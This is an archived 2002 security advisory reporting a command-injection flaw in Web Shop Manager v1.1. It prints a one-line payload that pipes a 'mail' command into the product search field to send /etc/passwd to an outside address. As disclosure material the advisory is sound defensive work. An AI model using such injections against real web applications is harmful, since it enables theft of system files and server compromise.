Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: web5603.htm

Web Shop Manager remote command execution



6th Aug 2002 [SBWID-5603]
COMMAND

	Web Shop Manager remote command execution

SYSTEMS AFFECTED

	Web Shop Manager v1.1

PROBLEM

	Tacettin Karadeniz [tacettinkaradeniz@yahoo.com] found :
	

	The Web Shop Manager allows you to  manage  a  fully  functional  online
	store from a centralized web-based administration system.
	

	Exploit:
	

	It is possible to  send  server's  password  file  any  mail  adress  by
	writing some command in php-webshop-manager  product  search  part.  The
	command which is written to search part:
	

	 |mail CiLeK@xxxkaradenizeregli.net < /etc/passwd

	

	By this command, password file sent to mail adress.

SOLUTION

	Check [http://www.webscriptworld.com], no update yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH